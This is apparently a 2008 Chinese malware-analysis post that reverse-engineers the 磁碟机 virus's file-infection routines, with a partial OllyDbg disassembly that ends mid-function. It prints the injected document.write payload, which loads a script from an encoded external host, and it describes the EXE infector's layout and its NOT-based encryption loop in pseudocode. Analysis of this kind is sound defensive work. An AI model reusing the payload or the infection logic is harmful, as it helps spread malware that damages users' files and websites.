为XXX研究所提供技术支持时截获的样本(com/lsass.exe、smss.exe),病毒中文名为磁碟机病毒,貌似很强,此等病毒岂能错过,分析之,不敢独乐,遂将感染方式贴上:
感染文件类型(按文件全名的后三位判断):
1 .htm, tml(即 .html 的后三位), .js
2 .exe
3 .rar, .zip
web文件感染函数:
1 按行读取web文件内容
2 如果没有找到与下面这句匹配的内容:document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>"); 则在文件尾部追加这一句。
exe文件感染函数:
被感染的文件包括三个部分:
1)被修改图标资源的病毒体
2)被加密的原文件
3)病毒体(加密后)
1 取C:/WINDOWS/system32/Com/LSASS.EXE文件信息。
2 读取C:/WINDOWS/system32/Com/LSASS.EXE文件到内存,并修改相应的资源内容,然后写到com/~临时文件中。
3 取待感染文件信息(后面用于恢复文件时间)。
4 读取待感染文件内容到内存,并进行加密,然后追加到com/~临时文件中。
5 再将C:/WINDOWS/system32/Com/LSASS.EXE文件读入内存,并加密写到com/~临时文件中。
6 将C:/WINDOWS/system32/Com/~临时文件拷贝到被感染文件位置。
//Add on 22:57 2008-1-9
对EXE的加密算法:
dwStart = 21B
g_dwVFileSize
g_dwNeedFilePos
bInfect = TRUE;
/* 每读取 g_dwVFileSize 个字节就加密一次。 */
while (fread(g_dwNeedFilePos/*pBuf*/, 1, g_dwVFileSize, file))
{
if (!bInfect) break;
ECX = dwStart;
ECX += 0x09;
while (1)
{
dwTmp = ECX;
if ECX > g_dwVFileSize
break;
EDX = g_dwNeedFilePos;
ECX += EDX;
byte tmp = Get [ECX];
not tmp;
Set [ECX], tmp;
ECX = dwTmp;
ECX += 0x0B;
}
ECX = 0;
dwTmp = ECX;
if g_dwVFileSize <= ECX
goto aa;
do
{
EDX = g_dwNeedFilePos;
ECX += EDX;
byte tmp = Get[ECX];
not tmp;
Set [ECX], tmp;
ECX = dwTmp;
ECX += 2;
if (ECX >= g_dwVFileSize)
break;
} while (1)
aa:
bInfect = FALSE;
}
//Add end 22:57 2008-1-9
具体分析见如下代码及注释:
1 遍历文件函数
00402200 |. 8D85 F4FDFFFF LEA EAX,DWORD PTR SS:[EBP-20C]
00402206 |. 50 PUSH EAX ; /pFindFileData
00402207 |. FF75 CC PUSH DWORD PTR SS:[EBP-34] ; |FileName
0040220A |. FF15 08A14000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstFileA>] ; /FindFirstFileA
00402210 |. 6A 01 PUSH 1 ; /RemoveMsg = PM_REMOVE
00402212 |. 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX ; |
00402215 |. 53 PUSH EBX ; |MsgFilterMax
00402216 |. 53 PUSH EBX ; |MsgFilterMin
00402217 |. 8D85 D8FDFFFF LEA EAX,DWORD PTR SS:[EBP-228] ; |
0040221D |. 53 PUSH EBX ; |hWnd
0040221E |. 50 PUSH EAX ; |pMsg
0040221F |. FF15 30A44000 CALL DWORD PTR DS:[<&USER32.PeekMessageA>] ; /PeekMessageA
00402225 |. 837D B8 FF CMP DWORD PTR SS:[EBP-48],-1
00402229 |. 0F84 BC080000 JE LSASS.00402AEB
0040222F |. BF 58E44000 MOV EDI,LSASS.0040E458 ; ASCII "8A;"
00402234 |> 8D85 20FEFFFF /LEA EAX,DWORD PTR SS:[EBP-1E0]
0040223A |. 68 04D14000 |PUSH LSASS.0040D104 ; /s2 = "."
0040223F |. 50 |PUSH EAX ; |s1
00402240 |. E8 0B650000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402245 |. 59 |POP ECX
00402246 |. 85C0 |TEST EAX,EAX
00402248 |. 59 |POP ECX
00402249 |. 0F84 7B080000 |JE LSASS.00402ACA
0040224F |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402255 |. 68 00D14000 |PUSH LSASS.0040D100 ; /s2 = ".."
0040225A |. 50 |PUSH EAX ; |s1
0040225B |. E8 F0640000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402260 |. 59 |POP ECX
00402261 |. 85C0 |TEST EAX,EAX
00402263 |. 59 |POP ECX
00402264 |. 0F84 60080000 |JE LSASS.00402ACA
0040226A |. F685 F4FDFFFF 10 |TEST BYTE PTR SS:[EBP-20C],10
00402271 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
...
004023A7 |. 0F86 1D070000 |JBE LSASS.00402ACA
004023AD |. FF75 C4 |PUSH DWORD PTR SS:[EBP-3C] ; /s2 = "tml"
004023B0 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023B3 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023B9 |. 59 |POP ECX
004023BA |. 85C0 |TEST EAX,EAX
004023BC |. 59 |POP ECX
004023BD |. 0F84 9E060000 |JE LSASS.00402A61
004023C3 |. FF75 C8 |PUSH DWORD PTR SS:[EBP-38] ; /s2 = "htm"
004023C6 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023C9 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023CF |. 59 |POP ECX
004023D0 |. 85C0 |TEST EAX,EAX
004023D2 |. 59 |POP ECX
004023D3 |. 0F84 88060000 |JE LSASS.00402A61
004023D9 |. 68 ACD14000 |PUSH LSASS.0040D1AC ; /s2 = ".js"
004023DE |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023E1 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023E7 |. 59 |POP ECX
004023E8 |. 85C0 |TEST EAX,EAX
004023EA |. 59 |POP ECX
004023EB |. 75 6D |JNZ SHORT LSASS.0040245A
004023ED |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000 ; web file infect
004023F7 |. 0F83 CD060000 |JNB LSASS.00402ACA
004023FD |. 51 |PUSH ECX
004023FE |. 8D86 9D010000 |LEA EAX,DWORD PTR DS:[ESI+19D]
00402404 |. 8BCC |MOV ECX,ESP
00402406 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402409 |. 50 |PUSH EAX
0040240A |. E8 FB610000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040240F |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
00402412 |. 68 08D14000 |PUSH LSASS.0040D108
00402417 |. 50 |PUSH EAX
00402418 |. 8D85 50FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B0]
0040241E |. 50 |PUSH EAX
0040241F |. C645 FC 11 |MOV BYTE PTR SS:[EBP-4],11
00402423 |. E8 06620000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402428 |. 51 |PUSH ECX
00402429 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040242F |. 8BCC |MOV ECX,ESP
00402431 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
00402434 |. 52 |PUSH EDX
00402435 |. 50 |PUSH EAX
00402436 |. 51 |PUSH ECX
00402437 |. C645 FC 12 |MOV BYTE PTR SS:[EBP-4],12
0040243B |. E8 EE610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402440 |. 8BCE |MOV ECX,ESI
00402442 |. C645 FC 13 |MOV BYTE PTR SS:[EBP-4],13
00402446 |. E8 4C070000 |CALL LSASS.00402B97 ; web file infect function
0040244B |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040244F |. 8D8D 50FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B0]
00402455 |. E9 6B060000 |JMP LSASS.00402AC5
0040245A |> 68 A8D14000 |PUSH LSASS.0040D1A8 ; /s2 = "exe"
0040245F |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
00402462 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402468 |. 59 |POP ECX
00402469 |. 85C0 |TEST EAX,EAX
0040246B |. 59 |POP ECX
0040246C |. 0F85 6C010000 |JNZ LSASS.004025DE ; exe infect
00402472 |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402478 |. 68 5CE44000 |PUSH LSASS.0040E45C ; ASCII "C:/WINDOWS/system32/com/LSASS.EXE"
0040247D |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402480 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
00402486 |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402489 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040248F |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
00402492 |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402498 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
0040249B |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
004024A1 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
004024A4 |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
004024AA |. 8D8E 78010000 |LEA ECX,DWORD PTR DS:[ESI+178]
004024B0 |. 889E B3010000 |MOV BYTE PTR DS:[ESI+1B3],BL
004024B6 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
004024B9 |. E8 5E610000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004024BE |. 68 A4D14000 |PUSH LSASS.0040D1A4 ; ASCII "/~"
004024C3 |. 8D85 48FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B8]
004024C9 |. 57 |PUSH EDI
004024CA |. 50 |PUSH EAX
004024CB |. E8 5E610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004024D0 |. 8D8E 7C010000 |LEA ECX,DWORD PTR DS:[ESI+17C]
004024D6 |. 50 |PUSH EAX
004024D7 |. C645 FC 14 |MOV BYTE PTR SS:[EBP-4],14
004024DB |. E8 42610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004024E0 |. 8D8D 48FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B8]
004024E6 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004024EA |. E8 0D600000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004024EF |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
004024F5 |. 50 |PUSH EAX
004024F6 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
004024F9 |. 50 |PUSH EAX
004024FA |. 8D85 40FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C0]
00402500 |. 50 |PUSH EAX
00402501 |. E8 28610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402506 |. 8D8E 74010000 |LEA ECX,DWORD PTR DS:[ESI+174]
0040250C |. 50 |PUSH EAX
0040250D |. C645 FC 15 |MOV BYTE PTR SS:[EBP-4],15
00402511 |. E8 0C610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402516 |. 8D8D 40FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C0]
0040251C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402520 |. E8 D75F0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402525 |. 8BCE |MOV ECX,ESI
00402527 |. E8 1C3E0000 |CALL LSASS.00406348 ; exe file infect function
0040252C |. 84C0 |TEST AL,AL
0040252E |. 74 04 |JE SHORT LSASS.00402534
00402530 |. C645 EF 01 |MOV BYTE PTR SS:[EBP-11],1
00402534 |> 389E B3010000 |CMP BYTE PTR DS:[ESI+1B3],BL
0040253A |. 0F84 8C000000 |JE LSASS.004025CC
00402540 |. 53 |PUSH EBX
00402541 |. 51 |PUSH ECX
00402542 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
00402548 |. 8BC4 |MOV EAX,ESP
0040254A |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
0040254D |. 51 |PUSH ECX
0040254E |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402551 |. 51 |PUSH ECX
00402552 |. 50 |PUSH EAX
00402553 |. E8 D6600000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402558 |. E8 64F8FFFF |CALL LSASS.00401DC1 ; setFileAttributes
0040255D |. 59 |POP ECX
0040255E |. 8D86 74010000 |LEA EAX,DWORD PTR DS:[ESI+174]
00402564 |. 8BCC |MOV ECX,ESP
00402566 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402569 |. 50 |PUSH EAX
0040256A |. E8 9B600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040256F |. 51 |PUSH ECX
00402570 |. 8D86 7C010000 |LEA EAX,DWORD PTR DS:[ESI+17C]
00402576 |. 8BCC |MOV ECX,ESP
00402578 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
0040257B |. 50 |PUSH EAX
0040257C |. C645 FC 16 |MOV BYTE PTR SS:[EBP-4],16
00402580 |. E8 85600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402585 |. 8BCE |MOV ECX,ESI
00402587 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040258B |. E8 4E070000 |CALL LSASS.00402CDE ; copy com/~ to original path
00402590 |. 8B86 74010000 |MOV EAX,DWORD PTR DS:[ESI+174]
00402596 |. 53 |PUSH EBX ; /hTemplateFile
00402597 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
0040259C |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
0040259E |. 53 |PUSH EBX ; |pSecurity
0040259F |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004025A1 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004025A6 |. 50 |PUSH EAX ; |FileName
004025A7 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004025AD |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004025B0 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
004025B3 |. 51 |PUSH ECX ; /pLastWrite
004025B4 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004025B7 |. 51 |PUSH ECX ; |pLastAccess
004025B8 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004025BB |. 51 |PUSH ECX ; |pCreationTime
004025BC |. 50 |PUSH EAX ; |hFile
004025BD |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
004025C3 |. FF75 D0 |PUSH DWORD PTR SS:[EBP-30] ; /hObject
004025C6 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
004025CC |> FFB6 7C010000 |PUSH DWORD PTR DS:[ESI+17C] ; /path
004025D2 |. FF15 58A34000 |CALL DWORD PTR DS:[<&MSVCRT._unlink>] ; /_unlink
004025D8 |. 59 |POP ECX
004025D9 |. E9 EC040000 |JMP LSASS.00402ACA
004025DE |> 68 A0D14000 |PUSH LSASS.0040D1A0 ; /s2 = "rar"
004025E3 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025E6 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004025EC |. 59 |POP ECX
004025ED |. 85C0 |TEST EAX,EAX
004025EF |. 59 |POP ECX
004025F0 |. 74 18 |JE SHORT LSASS.0040260A
004025F2 |. 68 9CD14000 |PUSH LSASS.0040D19C ; /s2 = "zip"
004025F7 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025FA |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402600 |. 59 |POP ECX
00402601 |. 85C0 |TEST EAX,EAX
00402603 |. 59 |POP ECX
00402604 |. 0F85 C0040000 |JNZ LSASS.00402ACA
0040260A |> 8B86 A6010000 |MOV EAX,DWORD PTR DS:[ESI+1A6]
00402610 |. 68 10F44000 |PUSH LSASS.0040F410 ; /s2 = "c:/program files/winrar/winrar.exe"
00402615 |. 50 |PUSH EAX ; |s1
00402616 |. FF15 A0A34000 |CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; /_mbscmp
0040261C |. 59 |POP ECX
0040261D |. 85C0 |TEST EAX,EAX
0040261F |. 59 |POP ECX
00402620 |. 0F84 A4040000 |JE LSASS.00402ACA
00402626 |. 399E AA010000 |CMP DWORD PTR DS:[ESI+1AA],EBX ; rar, zip file infect
0040262C |. 0F8F 98040000 |JG LSASS.00402ACA
00402632 |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],500000
0040263C |. 0F87 88040000 |JA LSASS.00402ACA
00402642 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402648 |. 50 |PUSH EAX
00402649 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
0040264C |. 50 |PUSH EAX
0040264D |. 8D85 34FFFFFF |LEA EAX,DWORD PTR SS:[EBP-CC]
00402653 |. 50 |PUSH EAX
00402654 |. E8 D55F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402659 |. 50 |PUSH EAX
0040265A |. 8D4D D8 |LEA ECX,DWORD PTR SS:[EBP-28]
0040265D |. C645 FC 17 |MOV BYTE PTR SS:[EBP-4],17
00402661 |. E8 BC5F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402666 |. 8D8D 34FFFFFF |LEA ECX,DWORD PTR SS:[EBP-CC]
0040266C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402670 |. E8 875E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402675 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
0040267A |. 8D85 7CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-84]
00402680 |. 57 |PUSH EDI
00402681 |. 50 |PUSH EAX
00402682 |. E8 A75F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402687 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040268D |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
00402691 |. 51 |PUSH ECX
00402692 |. 50 |PUSH EAX
00402693 |. 8D85 54FFFFFF |LEA EAX,DWORD PTR SS:[EBP-AC]
00402699 |. 50 |PUSH EAX
0040269A |. E8 8F5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040269F |. 68 08D14000 |PUSH LSASS.0040D108
004026A4 |. 50 |PUSH EAX
004026A5 |. 8D45 94 |LEA EAX,DWORD PTR SS:[EBP-6C]
004026A8 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026AC |. 50 |PUSH EAX
004026AD |. E8 7C5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004026B2 |. 50 |PUSH EAX
004026B3 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004026B6 |. C645 FC 1A |MOV BYTE PTR SS:[EBP-4],1A
004026BA |. E8 635F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004026BF |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
004026C2 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026C6 |. E8 315E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026CB |. 8D8D 54FFFFFF |LEA ECX,DWORD PTR SS:[EBP-AC]
004026D1 |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
004026D5 |. E8 225E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026DA |. 8D8D 7CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-84]
004026E0 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004026E4 |. E8 135E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026E9 |. 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
004026EC |. 50 |PUSH EAX
004026ED |. 8D85 6CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-94]
004026F3 |. 68 8CD14000 |PUSH LSASS.0040D18C ; ASCII " X ""
004026F8 |. 50 |PUSH EAX
004026F9 |. E8 365F0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
004026FE |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
00402703 |. 50 |PUSH EAX
00402704 |. 8D85 4CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-B4]
0040270A |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
0040270E |. 50 |PUSH EAX
0040270F |. E8 1A5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402714 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
00402717 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
0040271B |. 51 |PUSH ECX
0040271C |. 50 |PUSH EAX
0040271D |. 8D85 74FFFFFF |LEA EAX,DWORD PTR SS:[EBP-8C]
00402723 |. 50 |PUSH EAX
00402724 |. E8 FF5E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
00402729 |. 68 74D14000 |PUSH LSASS.0040D174 ; ASCII "" -r -inul -ibck -y"
0040272E |. 50 |PUSH EAX
0040272F |. 8D85 3CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-C4]
00402735 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402739 |. 50 |PUSH EAX
0040273A |. E8 EF5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040273F |. C645 FC 1E |MOV BYTE PTR SS:[EBP-4],1E
00402743 |. 50 |PUSH EAX
00402744 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
00402747 |. E8 D65E0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
0040274C |. 8D8D 3CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-C4]
00402752 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402756 |. E8 A15D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040275B |. 8D8D 74FFFFFF |LEA ECX,DWORD PTR SS:[EBP-8C]
00402761 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
00402765 |. E8 925D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040276A |. 8D8D 4CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-B4]
00402770 |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
00402774 |. E8 835D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402779 |. 8D8D 6CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-94]
0040277F |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402783 |. E8 745D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402788 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
0040278B |. 50 |PUSH EAX
0040278C |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
00402792 |. 50 |PUSH EAX
00402793 |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]
00402799 |. 50 |PUSH EAX
0040279A |. E8 895E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040279F |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
004027A1 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027A7 |. 50 |PUSH EAX ; |dest
004027A8 |. E8 5F5F0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
004027AD |. 59 |POP ECX
004027AE |. 59 |POP ECX
004027AF |. 8D8D 38FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C8]
004027B5 |. E8 425D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004027BA |. 53 |PUSH EBX ; /Arg5
004027BB |. 53 |PUSH EBX ; |Arg4
004027BC |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027C2 |. 53 |PUSH EBX ; |Arg3
004027C3 |. 50 |PUSH EAX ; |Arg2
004027C4 |. 53 |PUSH EBX ; |Arg1
004027C5 |. 8BCE |MOV ECX,ESI ; |
004027C7 |. E8 2F410000 |CALL LSASS.004068FB ; /LSASS.004068FB
004027CC |. 85C0 |TEST EAX,EAX ; unpack rar/zip file
004027CE |. 74 40 |JE SHORT LSASS.00402810
004027D0 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
004027D5 |. 8D85 64FFFFFF |LEA EAX,DWORD PTR SS:[EBP-9C]
004027DB |. 57 |PUSH EDI
004027DC |. 50 |PUSH EAX
004027DD |. E8 4C5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027E2 |. 51 |PUSH ECX
004027E3 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
004027E9 |. 8BCC |MOV ECX,ESP
004027EB |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
004027EE |. 52 |PUSH EDX
004027EF |. 50 |PUSH EAX
004027F0 |. 51 |PUSH ECX
004027F1 |. C645 FC 1F |MOV BYTE PTR SS:[EBP-4],1F
004027F5 |. E8 345E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027FA |. 8BCE |MOV ECX,ESI
004027FC |. E8 E0F5FFFF |CALL LSASS.00401DE1
00402801 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402805 |. 8D8D 64FFFFFF |LEA ECX,DWORD PTR SS:[EBP-9C]
0040280B |. E9 B5020000 |JMP LSASS.00402AC5
00402810 |> A1 08F44000 |MOV EAX,DWORD PTR DS:[40F408]
00402815 |. 51 |PUSH ECX
00402816 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
00402819 |. A1 04F44000 |MOV EAX,DWORD PTR DS:[40F404]
0040281E |. FF86 AA010000 |INC DWORD PTR DS:[ESI+1AA]
00402824 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
00402827 |. 8D45 DC |LEA EAX,DWORD PTR SS:[EBP-24]
0040282A |. 8BCC |MOV ECX,ESP
0040282C |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
0040282F |. 50 |PUSH EAX
00402830 |. E8 D55D0000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402835 |. 8BCE |MOV ECX,ESI
00402837 |. E8 85F8FFFF |CALL LSASS.004020C1
0040283C |. 8B45 D0 |MOV EAX,DWORD PTR SS:[EBP-30]
0040283F |. 3905 04F44000 |CMP DWORD PTR DS:[40F404],EAX
00402845 |. 7F 4B |JG SHORT LSASS.00402892
00402847 |. 8B45 E4 |MOV EAX,DWORD PTR SS:[EBP-1C]
0040284A |. 3905 08F44000 |CMP DWORD PTR DS:[40F408],EAX
00402850 |. 7F 40 |JG SHORT LSASS.00402892
00402852 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402857 |. 8D85 5CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-A4]
0040285D |. 57 |PUSH EDI
0040285E |. 50 |PUSH EAX
0040285F |. E8 CA5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402864 |. 51 |PUSH ECX
00402865 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040286B |. 8BCC |MOV ECX,ESP
0040286D |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402870 |. 52 |PUSH EDX
00402871 |. 50 |PUSH EAX
00402872 |. 51 |PUSH ECX
00402873 |. C645 FC 26 |MOV BYTE PTR SS:[EBP-4],26
00402877 |. E8 B25D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040287C |. 8BCE |MOV ECX,ESI
0040287E |. E8 5EF5FFFF |CALL LSASS.00401DE1
00402883 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402887 |. 8D8D 5CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-A4]
0040288D |. E9 C2010000 |JMP LSASS.00402A54
00402892 |> 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
00402895 |. 50 |PUSH EAX
00402896 |. 8D85 78FFFFFF |LEA EAX,DWORD PTR SS:[EBP-88]
0040289C |. 68 6CD14000 |PUSH LSASS.0040D16C ; ASCII " A ""
004028A1 |. 50 |PUSH EAX
004028A2 |. E8 8D5D0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
